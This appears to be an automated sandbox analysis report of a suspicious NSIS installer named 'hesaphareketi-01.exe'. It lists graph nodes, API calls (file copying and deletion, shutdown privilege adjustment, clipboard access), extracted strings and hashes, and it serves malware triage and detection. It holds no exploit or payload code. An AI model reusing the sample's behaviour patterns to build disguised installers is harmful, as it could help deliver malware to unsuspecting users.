4263->4265 4266 402096 4264->4266 4265->4266 4266->4255 4267 4020e2 FreeLibrary 4266->4267 4267->4255 4270 4066f5 GetProcAddress 4269->4270 4271 402080 4269->4271 4270->4271 4271->4260 4271->4261 4273 10001789 4272->4273 4314 10001b18 4273->4314 4275 10001790 4276 100018a6 4275->4276 4277 100017a1 4275->4277 4278 100017a8 4275->4278 4276->4266 4362 10002286 4277->4362 4346 100022d0 4278->4346 4283 1000180c 4287 10001812 4283->4287 4288 1000184e 4283->4288 4284 100017ee 4375 100024a4 4284->4375 4285 100017d7 4298 100017cd 4285->4298 4372 10002b57 4285->4372 4286 100017be 4290 100017c4 4286->4290 4291 100017cf 4286->4291 4293 100015b4 3 API calls 4287->4293 4295 100024a4 10 API calls 4288->4295 4290->4298 4356 1000289c 4290->4356 4366 10002640 4291->4366 4300 10001828 4293->4300 4301 10001840 4295->4301 4296 100017f4 4386 100015b4 4296->4386 4298->4283 4298->4284 4304 100024a4 10 API calls 4300->4304 4306 10001895 4301->4306 4397 10002467 4301->4397 4303 100017d5 4303->4298 4304->4301 4306->4276 4308 1000189f GlobalFree 4306->4308 4308->4276 4311 10001881 4311->4306 4401 1000153d wsprintfW 4311->4401 4312 1000187a FreeLibrary 4312->4311 4404 1000121b GlobalAlloc 4314->4404 4316 10001b3c 4405 1000121b GlobalAlloc 4316->4405 4318 10001d7a GlobalFree GlobalFree GlobalFree 4320 10001d97 4318->4320 4334 10001de1 4318->4334 4319 10001b47 4319->4318 4323 10001c1d GlobalAlloc 4319->4323 4325 10001c68 lstrcpyW 4319->4325 4326 10001c86 GlobalFree 4319->4326 4329 10001c72 lstrcpyW 4319->4329 4319->4334 4336 10002048 4319->4336 4340 10001cc4 4319->4340 4341 10001f37 GlobalFree 4319->4341 4343 1000122c 2 API calls 4319->4343 4411 1000121b GlobalAlloc 4319->4411 4321 10001dac 4320->4321 4322 100020ee 4320->4322 4320->4334 4321->4334 4408 1000122c 4321->4408 4324 10002110 GetModuleHandleW 4322->4324 4322->4334 4323->4319 4327 10002121 LoadLibraryW 4324->4327 4328 10002136 4324->4328 4325->4329 4326->4319 4327->4328 4327->4334 4412 100015ff WideCharToMultiByte GlobalAlloc 
WideCharToMultiByte GetProcAddress GlobalFree 4328->4412 4329->4319 4331 10002188 4333 10002195 lstrlenW 4331->4333 4331->4334 4413 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4333->4413 4334->4275 4335 10002148 4335->4331 4345 10002172 GetProcAddress 4335->4345 4336->4334 4339 10002090 lstrcpyW 4336->4339 4339->4334 4340->4319 4406 1000158f GlobalSize GlobalAlloc 4340->4406 4341->4319 4342 100021af 4342->4334 4343->4319 4345->4331 4353 100022e8 4346->4353 4347 1000122c GlobalAlloc lstrcpynW 4347->4353 4349 10002410 GlobalFree 4350 100017ae 4349->4350 4349->4353 4350->4285 4350->4286 4350->4298 4351 100023ba GlobalAlloc CLSIDFromString 4351->4349 4352 1000238f GlobalAlloc WideCharToMultiByte 4352->4349 4353->4347 4353->4349 4353->4351 4353->4352 4355 100023d9 4353->4355 4415 100012ba 4353->4415 4355->4349 4419 100025d4 4355->4419 4358 100028ae 4356->4358 4357 10002953 CreateFileA 4359 10002971 4357->4359 4358->4357 4360 10002a62 GetLastError 4359->4360 4361 10002a6d 4359->4361 4360->4361 4361->4298 4363 10002296 4362->4363 4364 100017a7 4362->4364 4363->4364 4365 100022a8 GlobalAlloc 4363->4365 4364->4278 4365->4363 4369 1000265c 4366->4369 4367 100026c0 4370 100026c5 GlobalSize 4367->4370 4371 100026cf 4367->4371 4368 100026ad GlobalAlloc 4368->4371 4369->4367 4369->4368 4370->4371 4371->4303 4373 10002b62 4372->4373 4374 10002ba2 GlobalFree 4373->4374 4422 1000121b GlobalAlloc 4375->4422 4377 100024ae 4378 10002506 MultiByteToWideChar 4377->4378 4379 1000252b StringFromGUID2 4377->4379 4380 1000253c lstrcpynW 4377->4380 4381 1000254f wsprintfW 4377->4381 4382 1000256c GlobalFree 4377->4382 4383 100025a7 GlobalFree 4377->4383 4384 10001272 2 API calls 4377->4384 4423 100012e1 4377->4423 4378->4377 4379->4377 4380->4377 4381->4377 4382->4377 4383->4296 4384->4377 4427 1000121b GlobalAlloc 4386->4427 4388 100015ba 4389 100015c7 lstrcpyW 4388->4389 4390 100015e1 4388->4390 4393 100015fb 4389->4393 4392 100015e6 wsprintfW 
4390->4392 4390->4393 4392->4393 4394 10001272 4393->4394 4395 100012b5 GlobalFree 4394->4395 4396 1000127b GlobalAlloc lstrcpynW 4394->4396 4395->4301 4396->4395 4398 10001861 4397->4398 4399 10002475 4397->4399 4398->4311 4398->4312 4399->4398 4400 10002491 GlobalFree 4399->4400 4400->4399 4402 10001272 2 API calls 4401->4402 4403 1000155e 4402->4403 4403->4306 4404->4316 4405->4319 4407 100015ad 4406->4407 4407->4340 4414 1000121b GlobalAlloc 4408->4414 4410 1000123b lstrcpynW 4410->4334 4411->4319 4412->4335 4413->4342 4414->4410 4416 100012c1 4415->4416 4417 1000122c 2 API calls 4416->4417 4418 100012df 4417->4418 4418->4353 4420 100025e2 VirtualAlloc 4419->4420 4421 10002638 4419->4421 4420->4421 4421->4355 4422->4377 4424 100012ea 4423->4424 4425 1000130c 4423->4425 4424->4425 4426 100012f0 lstrcpyW 4424->4426 4425->4377 4426->4425 4427->4388 5338 402a2f 5339 402c15 17 API calls 5338->5339 5340 402a35 5339->5340 5341 402a6c 5340->5341 5342 402885 5340->5342 5344 402a47 5340->5344 5341->5342 5343 4062a4 17 API calls 5341->5343 5343->5342 5344->5342 5346 4061c9 wsprintfW 5344->5346 5346->5342 5347 401a30 5348 402c37 17 API calls 5347->5348 5349 401a39 ExpandEnvironmentStringsW 5348->5349 5350 401a4d 5349->5350 5352 401a60 5349->5352 5351 401a52 lstrcmpW 5350->5351 5350->5352 5351->5352 5358 4043b4 5359 4043cc 5358->5359 5363 4044e6 5358->5363 5364 404217 18 API calls 5359->5364 5360 404550 5361 40461a 5360->5361 5362 40455a GetDlgItem 5360->5362 5369 40427e 8 API calls 5361->5369 5365 404574 5362->5365 5366 4045db 5362->5366 5363->5360 5363->5361 5367 404521 GetDlgItem SendMessageW 5363->5367 5368 404433 5364->5368 5365->5366 5372 40459a SendMessageW LoadCursorW SetCursor 5365->5372 5366->5361 5373 4045ed 5366->5373 5391 404239 KiUserCallbackDispatcher 5367->5391 5371 404217 18 API calls 5368->5371 5379 404615 5369->5379 5377 404440 CheckDlgButton 5371->5377 5392 404663 5372->5392 5374 404603 5373->5374 5375 4045f3 SendMessageW 5373->5375 5374->5379 5380 
404609 SendMessageW 5374->5380 5375->5374 5376 40454b 5381 40463f SendMessageW 5376->5381 5389 404239 KiUserCallbackDispatcher 5377->5389 5380->5379 5381->5360 5384 40445e GetDlgItem 5390 40424c SendMessageW 5384->5390 5386 404474 SendMessageW 5387 404491 GetSysColor 5386->5387 5388 40449a SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5386->5388 5387->5388 5388->5379 5389->5384 5390->5386 5391->5376 5395 4058aa ShellExecuteExW 5392->5395 5394 4045c9 LoadCursorW SetCursor 5394->5366 5395->5394 4715 401735 4716 402c37 17 API calls 4715->4716 4717 40173c SearchPathW 4716->4717 4718 401757 4717->4718 4720 4029e0 4717->4720 4718->4720 4721 406282 lstrcpynW 4718->4721 4721->4720 5396 402835 5397 40283d 5396->5397 5398 402841 FindNextFileW 5397->5398 5400 402853 5397->5400 5398->5400 5399 4029e0 5400->5399 5402 406282 lstrcpynW 5400->5402 5402->5399 5403 10002a77 5404 10002a8f 5403->5404 5405 1000158f 2 API calls 5404->5405 5406 10002aaa 5405->5406 5407 4014b8 5408 4014be 5407->5408 5409 401389 2 API calls 5408->5409 5410 4014c6 5409->5410 5411 404a3c 5412 404a68 5411->5412 5413 404a4c 5411->5413 5415 404a9b 5412->5415 5416 404a6e SHGetPathFromIDListW 5412->5416 5422 4058c8 GetDlgItemTextW 5413->5422 5417 404a85 SendMessageW 5416->5417 5418 404a7e 5416->5418 5417->5415 5420 40140b 2 API calls 5418->5420 5419 404a59 SendMessageW 5419->5412 5420->5417 5422->5419 4748 403d3e 4749 403e91 4748->4749 4750 403d56 4748->4750 4751 403ea2 GetDlgItem GetDlgItem 4749->4751 4752 403ee2 4749->4752 4750->4749 4753 403d62 4750->4753 4756 404217 18 API calls 4751->4756 4757 403f3c 4752->4757 4765 401389 2 API calls 4752->4765 4754 403d80 4753->4754 4755 403d6d SetWindowPos 4753->4755 4758 403d85 ShowWindow 4754->4758 4759 403d9d 4754->4759 4755->4754 4760 403ecc SetClassLongW 4756->4760 4761 404263 SendMessageW 4757->4761 4779 403e8c 4757->4779 4758->4759 4762 403da5 DestroyWindow 4759->4762 4763 403dbf 4759->4763 4764 40140b 2 API calls 4760->4764 4787 403f4e 4761->4787 
4818 4041a0 4762->4818 4766 403dc4 SetWindowLongW 4763->4766 4767 403dd5 4763->4767 4764->4752 4768 403f14 4765->4768 4766->4779 4771 403de1 GetDlgItem 4767->4771 4772 403e7e 4767->4772 4768->4757 4773 403f18 SendMessageW 4768->4773 4769 40140b 2 API calls 4769->4787 4770 4041a2 DestroyWindow EndDialog 4770->4818 4775 403e11 4771->4775 4776 403df4 SendMessageW IsWindowEnabled 4771->4776 4777 40427e 8 API calls 4772->4777 4773->4779 4774 4041d1 ShowWindow 4774->4779 4780 403e1e 4775->4780 4781 403e31 4775->4781 4782 403e65 SendMessageW 4775->4782 4791 403e16 4775->4791 4776->4775 4776->4779 4777->4779 4778 4062a4 17 API calls 4778->4787 4780->4782 4780->4791 4784 403e39 4781->4784 4785 403e4e 4781->4785 4782->4772 4783 4041f0 SendMessageW 4786 403e4c 4783->4786 4788 40140b 2 API calls 4784->4788 4789 40140b 2 API calls 4785->4789 4786->4772 4787->4769 4787->4770 4787->4778 4787->4779 4790 404217 18 API calls 4787->4790 4793 404217 18 API calls 4787->4793 4809 4040e2 DestroyWindow 4787->4809 4788->4791 4792 403e55 4789->4792 4790->4787 4791->4783 4792->4772 4792->4791 4794 403fc9 GetDlgItem 4793->4794 4795 403fe6 ShowWindow KiUserCallbackDispatcher 4794->4795 4796 403fde 4794->4796 4819 404239 KiUserCallbackDispatcher 4795->4819 4796->4795 4798 404010 EnableWindow 4803 404024 4798->4803 4799 404029 GetSystemMenu EnableMenuItem SendMessageW 4800 404059 SendMessageW 4799->4800 4799->4803 4800->4803 4802 403d1f 18 API calls 4802->4803 4803->4799 4803->4802 4820 40424c SendMessageW 4803->4820 4821 406282 lstrcpynW 4803->4821 4805 404088 lstrlenW 4806 4062a4 17 API calls 4805->4806 4807 40409e SetWindowTextW 4806->4807 4808 401389 2 API calls 4807->4808 4808->4787 4810 4040fc CreateDialogParamW 4809->4810 4809->4818 4811 40412f 4810->4811 4810->4818 4812 404217 18 API calls 4811->4812 4813 40413a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4812->4813 4814 401389 2 API calls 4813->4814 4815 404180 4814->4815 4815->4779 4816 404188 ShowWindow 4815->4816 4817 404263 
SendMessageW 4816->4817 4817->4818 4818->4774 4818->4779 4819->4798 4820->4803 4821->4805

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE ref: 00403396
                                                                                      • GetVersion.KERNEL32 ref: 0040339C
                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033CF
                                                                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040340C
                                                                                      • OleInitialize.OLE32(00000000), ref: 00403413
                                                                                      • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040342F
                                                                                      • GetCommandLineW.KERNEL32(Cellulipetally Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00403444
                                                                                      • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\hesaphareketi-01.exe",00000000,?,00000006,00000008,0000000A), ref: 00403457
                                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\hesaphareketi-01.exe",00000020,?,00000006,00000008,0000000A), ref: 0040347E
                                                                                        • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                                                        • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035B8
                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C9
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035D5
                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E9
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004035F1
                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403602
                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040360A
                                                                                      • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040361E
                                                                                        • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,Cellulipetally Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                                                      • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E9
                                                                                      • ExitProcess.KERNEL32 ref: 0040370A
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 0040371D
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 0040372C
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403737
                                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\hesaphareketi-01.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403743
                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040375F
                                                                                      • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037B9
                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\hesaphareketi-01.exe,0042AA08,00000001,?,00000006,00000008,0000000A), ref: 004037CD
                                                                                      • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 004037FA
                                                                                      • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403829
                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403830
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403845
                                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 00403868
                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 0040388D
                                                                                      • ExitProcess.KERNEL32 ref: 004038B0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                      • String ID: "C:\Users\user\Desktop\hesaphareketi-01.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Undige$C:\Users\user\AppData\Local\Temp\Undige\Chowderheaded\ukyndighed\Asymmetrically$C:\Users\user\Desktop$C:\Users\user\Desktop\hesaphareketi-01.exe$Cellulipetally Setup$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                      • API String ID: 2488574733-3272610396
                                                                                      • Opcode ID: 5fbb855ab9531fef191cbbcaf928c14bc3d0a422fd09daf3f3abe40e76e76a55
                                                                                      • Instruction ID: 7b86b6c626ebcb02b9d5dbe90ebec93722fb19806190c38ba91b5de258dcc2d7
                                                                                      • Opcode Fuzzy Hash: 5fbb855ab9531fef191cbbcaf928c14bc3d0a422fd09daf3f3abe40e76e76a55
                                                                                      • Instruction Fuzzy Hash: 0CD12571500310ABD720BF759D45A2B3AACEB4070AF11487FF981B62E1DB7D8E45876E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      [Control-flow graph figure for the function whose first block is 405425-405440; node and edge listing not reproduced]
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000403), ref: 00405483
                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00405492
                                                                                      • GetClientRect.USER32(?,?), ref: 004054CF
                                                                                      • GetSystemMetrics.USER32(00000002), ref: 004054D6
                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054F7
                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405508
                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040551B
                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405529
                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040553C
                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040555E
                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405572
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405593
                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A3
                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055BC
                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055C8
                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 004054A1
                                                                                        • Part of subcall function 0040424C: SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004055E5
                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000053B9,00000000), ref: 004055F3
                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 004055FA
                                                                                      • ShowWindow.USER32(00000000), ref: 0040561E
                                                                                      • ShowWindow.USER32(00010474,00000008), ref: 00405623
                                                                                      • ShowWindow.USER32(00000008), ref: 0040566D
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A1
                                                                                      • CreatePopupMenu.USER32 ref: 004056B2
                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056C6
                                                                                      • GetWindowRect.USER32(?,?), ref: 004056E6
                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056FF
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405737
                                                                                      • OpenClipboard.USER32(00000000), ref: 00405747
                                                                                      • EmptyClipboard.USER32 ref: 0040574D
                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405759
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405763
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405777
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405797
                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004057A2
                                                                                      • CloseClipboard.USER32 ref: 004057A8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                      • String ID: {
                                                                                      • API String ID: 590372296-366298937
                                                                                      • Opcode ID: f558cd562b561a2b708a6e47d27340253300c3298c9f6e828ca62f216568898c
                                                                                      • Instruction ID: 2f82927f57e7d4f45bca6e23eab998b55dded590160266c2ba262d9988700e91
                                                                                      • Opcode Fuzzy Hash: f558cd562b561a2b708a6e47d27340253300c3298c9f6e828ca62f216568898c
                                                                                      • Instruction Fuzzy Hash: 37B16970800608BFDB119FA0DD89AAE7B79FB48355F00403AFA45B61A0CB759E51DF68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                      • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1296135375.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1296082839.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000000.00000002.1296189107.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000000.00000002.1296242418.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$lstrcpy$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 4227406936-0
                                                                                      • Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                                                      • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                      • Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                                                      • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      [Control-flow graph figure for the function whose first block is 405990-4059b6; node and edge listing not reproduced]
                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75383420,00000000), ref: 004059B9
                                                                                      • lstrcatW.KERNEL32(Idedramaerne\retlede\sheepsplit\terebinthinate\ishjs\gnidetryk.ban,\*.*), ref: 00405A01
                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405A24
                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,Idedramaerne\retlede\sheepsplit\terebinthinate\ishjs\gnidetryk.ban,?,?,C:\Users\user\AppData\Local\Temp\,75383420,00000000), ref: 00405A2A
                                                                                      • FindFirstFileW.KERNELBASE(Idedramaerne\retlede\sheepsplit\terebinthinate\ishjs\gnidetryk.ban,?,?,?,0040A014,?,Idedramaerne\retlede\sheepsplit\terebinthinate\ishjs\gnidetryk.ban,?,?,C:\Users\user\AppData\Local\Temp\,75383420,00000000), ref: 00405A3A
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ADA
                                                                                      • FindClose.KERNEL32(00000000), ref: 00405AE9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                      • String ID: "C:\Users\user\Desktop\hesaphareketi-01.exe"$C:\Users\user\AppData\Local\Temp\$Idedramaerne\retlede\sheepsplit\terebinthinate\ishjs\gnidetryk.ban$\*.*
                                                                                      • API String ID: 2035342205-3279201731
                                                                                      • Opcode ID: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
                                                                                      • Instruction ID: f2c7612d72ec45a398f238805cdec5f3e53338685f49ce317d80e039c8d46841
                                                                                      • Opcode Fuzzy Hash: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
                                                                                      • Instruction Fuzzy Hash: 4E41C230A01A14AACB21AB658C89AAF7778DF81764F14427FF801711C1D77CA992DE6E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(?,00430298,C:\,00405CA4,C:\,C:\,00000000,C:\,C:\,?,?,75383420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75383420), ref: 004065D0
                                                                                      • FindClose.KERNELBASE(00000000), ref: 004065DC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
